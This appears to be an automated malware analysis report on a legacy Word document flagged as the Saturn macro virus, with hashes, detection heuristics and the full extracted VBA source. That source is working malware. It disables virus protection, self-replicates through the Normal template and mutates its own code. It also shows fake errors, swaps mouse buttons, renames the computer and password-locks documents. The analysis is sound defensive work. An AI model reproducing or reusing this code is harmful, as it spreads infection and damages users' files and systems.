Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da6d191bdbd300a9…

MALICIOUS

Office (OLE)

Size: 32.5 KB
Created: 1998-10-25 15:52:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 84e41109fdcf7b28c2411149ea7ac1f9
SHA-1: 2518088f65ed9c8c077915c735f4892c5b8cb746
SHA-256: da6d191bdbd300a950385da94e6d18683ca802ba9c0e3d68b6d7ea340e8aee29
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing malicious VBA macros that run on the AutoOpen and AutoClose events. The macros copy themselves between the Normal template and the active document, indicating an intent to establish persistence and spread to other documents. The ClamAV detection 'Doc.Trojan.Saturn-1' further supports its malicious nature. The specific IOCs are the file paths the macro uses when copying itself.

Heuristics 5

  • ClamAV: Doc.Trojan.Saturn-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Saturn-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3194 bytes
SHA-256: b73c5da54cb592679ea5fbca37c7c4d0acbdad113717e1a6538068b11881e967
Detection
ClamAV: Doc.Trojan.Saturn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Saturn"
Private Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long

Sub AutoOpen()
    On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    Options.VirusProtection = False
    DocInfect = False
    GlobInfect = False
    For b = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(b).Name = "Saturn" Then
            DocInfect = True
        End If
    Next
    For U = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(U).Name = "Saturn" Then
            GlobInfect = True
        End If
    Next
    If DocInfect = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Saturn", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If
    If GlobInfect = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Saturn", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If
    Saturn
    Application.DisplayAlerts = wdAlertsAll
End Sub

Sub AutoClose()
    On Error Resume Next
    Call UMP
    Saturn
    Call UMP
    ActiveDocument.Save
End Sub

Sub Stealth()
    On Error Resume Next
    Call UMP
    RM = Int(Rnd * 5) + 1
    If RM = 1 Then smeg$ = "Not enough memory to perform this operation"
    If RM = 2 Then smeg$ = "Impossible open this function"
    If RM = 3 Then smeg$ = "Function does not answer system requests"
    If RM = 4 Then smeg$ = "This program has performed an illegal operation and will be locked"
    If RM = 5 Then smeg$ = "This option at present not available"
    steMsgType = vbCritical + vbOKCancel + vbMsgBoxHelpButton
    message = MsgBox(smeg$, steMsgType, "Microsoft Word")
    If vbOKCancel Then
        SMB = SwapMouseButton(&H4)
        Documents.Close
    End If
End Sub

Sub ToolsMacro()
    Stealth
End Sub

Sub ToolsCustomize()
    Stealth
End Sub

Sub ViewVBCode()
    Stealth
End Sub

Sub Saturn()
    On Error Resume Next
    'Saturn by ULTRAS [SOS]
    If Day(Now()) = Int(Rnd() * 30 + 1) Then
        Computer = SetComputerName("SOS")
        ActiveDocument.Password = "SOS" & Int(Rnd * 333) + 1
        ActiveDocument.Save
    End If
End Sub

Sub UMP()
    'ULTRAS MACRO POLYMORPHIC
    PoNu = Int(Rnd() * 28 + 1)
    For Mutate = 1 To PoNu
        PoRL = Application.VBE.ActiveVBProject.VBComponents("Saturn").CodeModule.CountOfLines
        PoLi = Int(Rnd() * PoRL + 1)
        a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
        Application.VBE.ActiveVBProject.VBComponents("Saturn").CodeModule.InsertLines PoLi, vbTab & "' " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e
    Next Mutate
End Sub